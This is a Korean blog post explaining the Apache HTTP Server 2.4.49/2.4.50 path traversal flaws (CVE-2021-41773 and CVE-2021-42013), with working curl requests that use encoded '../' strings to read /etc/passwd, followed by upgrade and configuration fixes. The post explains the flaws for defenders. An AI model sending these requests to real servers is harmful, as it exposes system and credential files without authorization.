Apache HTTP Server 2.4.49 / 2.4.50에서 발견된 취약점으로
경로 탐색 문자열에 대한 필터링 미흡으로 발생하는 취약점이다.
취약점 설명
상위 디렉토리를 의미하는 문자열 "../" 에 대한 필터링이 미흡해 발생한 취약점
Apache는 기본적으로 ../ 문자열을 차단 시키지만 URL 인코딩을 통해 우회가 가능하다.
2.4.49에서 해당 취약점을 조치했지만 URL 더블 인코딩으로 우회가 가능하다.
../ 차단
%2E%2E/ 허용(2.4.49 / CVE-2021-41773)
.%%32%65/ 허용(2.4.50 / CVE-2021-42013)2.4.51 버전에서 조치가 완료되었다.
위험성
위 문제로 인해 정확한 사례는 찾아볼 수 없지만 서버 내 중요파일 등을 획등할 수 있다
- 중요파일 예) db_connect.php, 각 서비스(FTP, SSH 등) 별 설정파일 등
발생 원인
Apache에 문자열 필터링 미흡
취약한 httpd.conf 설정
CVE 구현
Request
CVE 구현은 정말 간단하다 ../ 문자열을 URL 인코딩하여 전송하기만 하면 된다.
굳이 따지면 얼마나 상위 디렉토리 문자열을 반복해야하는지가 테스트해야한다.
1) Apache 버전 확인
2) Request 전송
ex) curl http://IP(도메인)/경로
[Apache HTTP Server 2.4.49]
curl http://1.1.1.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[Apache HTTP Server 2.4.50]
curl http://1.1.1.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd실행 결과
대응방안
Apache HTTP Server 2.4.51 버전으로 업데이트
아래 링크에서 다운로드
Download - The Apache HTTP Server Project
Downloading the Apache HTTP Server Use the links below to download the Apache HTTP Server from our download servers. You must verify the integrity of the downloaded files using signatures downloaded from our main distribution directory. The signatures can
httpd.apache.org
기본 설정인 denied로 변경
기본 설정인 denied로 변경
<Directory />
AllowOverrides none
Require all denied
</Directory>
'취약점 진단 > CVE' 카테고리의 다른 글
| [CVE-2020-1938] Ghostcat Tomcat AJP 프로토콜 취약점 (0) | 2023.04.12 |
|---|
